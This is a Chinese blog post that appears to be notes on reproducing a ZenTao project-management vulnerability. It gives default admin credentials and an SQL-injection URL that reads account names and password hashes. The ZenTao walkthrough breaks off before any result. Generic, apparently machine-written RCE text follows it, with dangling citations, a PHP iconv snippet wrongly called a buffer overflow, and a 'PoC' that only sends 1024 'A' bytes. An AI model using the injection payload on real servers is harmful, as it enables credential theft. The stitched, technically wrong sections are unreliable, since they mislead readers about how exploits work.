禅道linux一键安装漏洞,禅道全版本rce漏洞复现笔记

本文详细介绍了禅道项目管理软件在Linux环境下的一键安装漏洞及其RCE漏洞复现过程。通过SQL注入、文件读取和远程代码执行等攻击手段,展示了漏洞的利用方式,提醒用户注意系统安全,避免使用一键安装包。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

禅道全版本rce漏洞复现笔记

漏洞说明

禅道项目管理软件是一款国产的,基于LGPL协议,开源免费的项目管理软件,它集产品管理、项目管理、测试管理于一体,同时还包含了事务管理、组织管理等诸多功能,是中小型企业项目管理的首选,基于自主的PHP开发框架──ZenTaoPHP而成,第三方开发者或企业可非常方便的开发插件或者进行定制。

此次发现的漏洞正是ZenTaoPHP框架中的通用代码所造成的的,因此禅道几乎所有的项目都受此漏洞影响。本次漏洞复现以ZenTaoPMS.11.6版本作为演示

环境搭建

ee7a3e0312bab28e2cd55c942c588bf9.png

9a95e1207b49d5ac8d396ec500eec904.png

至此环境搭建成功

漏洞复现

漏洞1 SQL注入

首先我们登录admin/CD87691043cs账户修改默认密码,创建一个普通Test0001/1qaz2wsx3edc!@#$用户并登录

Payload

http://127.0.0.1/zentao/api-getModel-api-sql-sql=select+account,password+from+zt_user

Poc访问结果如下:

### 关于远程代码执行(RCE)漏洞复现的方法 #### 背景介绍 远程代码执行(Remote Code Execution, RCE)是一种高危漏洞,允许攻击者在未授权的情况下,在目标系统的上下文中运行任意代码。这种类型的漏洞通常存在于网络服务、Web 应用程序或其他暴露在网络中的软件中。 #### 复现步骤概述 以下是基于已知案例的通用复现流程: 1. **环境搭建** 需要创建一个模拟真实场景的测试环境来重现漏洞行为。例如,可以使用虚拟机或容器技术隔离实验环境[^4]。 2. **工具准备** 准备必要的开发和调试工具链,包括但不限于 Python 脚本、Metasploit 模块以及其他辅助工具。对于某些特定漏洞,还需要安装对应的依赖库[^1]。 3. **分析漏洞原理** 对具体漏洞的工作机制进行深入研究。比如 CVE-2020-0796 是由于 SMB 协议处理不当引起的 RCE 漏洞,了解其触发条件至关重要[^2]。 4. **编写利用脚本** 根据漏洞特性设计相应的 Payload 或 Exploit 脚本来实现远程代码注入功能。如果存在返回导向编程(ROP),则需额外考虑如何规避 ASLR 和 DEP 等防护措施。 5. **测试与调整** 尝试多次运行编写的 POC (Proof of Concept), 并依据反馈不断优化直至成功达成预期效果为止。 #### 实际案例解析 - PHP 缓冲区溢出漏洞 在一个实际的例子当中提到过有关 iconv() 的调用问题最后却意外发现该缺陷非常适合应用于 PHP 应用层面造成严重的后果[^3]: ```php <?php // 假设这里有一个可控输入参数 $data $data = $_GET['input']; $converted_data = iconv('UTF-8', 'ISO-8859-1//IGNORE', $data); echo $converted_data; ?> ``` 上述代码片段展示了当用户提交的数据长度超过预定义缓冲大小时可能会引发堆栈破坏进而导致不可预测的行为发生。 --- ### 提供一段简单的 IPv6-RCE PoC 示例代码如下所示: ```python import socket def send_payload(ip_address): payload = b"A"*1024 # 构造超长字符串作为载荷尝试覆盖内存区域 try: sckt = socket.socket(socket.AF_INET6, socket.SOCK_STREAM) sckt.connect((ip_address, 80)) sckt.sendall(payload) response = sckt.recv(1024).decode() print(f"Received Response: {response}") except Exception as e: print(e) if __name__ == "__main__": target_ip = "<目标IPv6地址>" send_payload(target_ip) ``` 注意替换 `<目标IPv6地址>` 成真实的 IP 地址前缀后再执行以上脚本。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值